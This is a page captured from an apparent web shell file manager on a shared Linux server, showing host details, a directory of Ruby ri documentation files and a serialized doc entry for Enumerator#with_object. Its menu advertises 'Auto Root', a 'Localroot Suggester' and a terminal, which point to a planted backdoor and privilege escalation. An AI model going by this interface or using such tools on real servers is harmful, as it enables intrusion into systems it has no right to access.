Linux server19.dn-server.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 46.209.20.154 & Your IP : 216.73.216.255
Domains :
Cant Read [ /etc/named.conf ]
User : emadteam
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby24 /
share /
ri /
2.4.0 /
system /
Enumerator /
Delete
Unzip
Name
Size
Permission
Date
Action
Generator
[ DIR ]
drwxr-xr-x
2023-09-19 09:15
Lazy
[ DIR ]
drwxr-xr-x
2023-09-19 09:15
Yielder
[ DIR ]
drwxr-xr-x
2023-09-19 09:15
cdesc-Enumerator.ri
3.35
KB
-rw-r--r--
2023-07-26 18:06
each-i.ri
1.53
KB
-rw-r--r--
2023-07-26 18:06
each_with_index-i.ri
537
B
-rw-r--r--
2023-07-26 18:06
each_with_object-i.ri
977
B
-rw-r--r--
2023-07-26 18:06
feed-i.ri
1.62
KB
-rw-r--r--
2023-07-26 18:06
inspect-i.ri
340
B
-rw-r--r--
2023-07-26 18:06
new-c.ri
1.55
KB
-rw-r--r--
2023-07-26 18:06
next-i.ri
928
B
-rw-r--r--
2023-07-26 18:06
next_values-i.ri
1.55
KB
-rw-r--r--
2023-07-26 18:06
peek-i.ri
807
B
-rw-r--r--
2023-07-26 18:06
peek_values-i.ri
985
B
-rw-r--r--
2023-07-26 18:06
rewind-i.ri
452
B
-rw-r--r--
2023-07-26 18:06
size-i.ri
598
B
-rw-r--r--
2023-07-26 18:06
with_index-i.ri
725
B
-rw-r--r--
2023-07-26 18:06
with_object-i.ri
957
B
-rw-r--r--
2023-07-26 18:06
Save
Rename
U:RDoc::AnyMethod[iI"with_object:ETI"Enumerator#with_object;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"PIterates the given block for each element with an arbitrary object, +obj+, ;TI"and returns +obj+;To:RDoc::Markup::BlankLine o; ; [I"4If no block is given, returns a new Enumerator.;T@S:RDoc::Markup::Heading: leveli: textI"Example;T@o:RDoc::Markup::Verbatim; [I"&to_three = Enumerator.new do |y| ;TI" 3.times do |x| ;TI" y << x ;TI" end ;TI" end ;TI" ;TI"8to_three_with_string = to_three.with_object("foo") ;TI"-to_three_with_string.each do |x,string| ;TI" puts "#{string}: #{x}" ;TI" end ;TI" ;TI"# => foo:0 ;TI"# => foo:1 ;TI"# => foo:2;T:@format0: @fileI"enumerator.c;T:0@omit_headings_from_table_of_contents_below0I"@e.with_object(obj) {|(*args), obj| ... } e.with_object(obj);T0[ I" (p1);T@%FI"Enumerator;TcRDoc::NormalClass00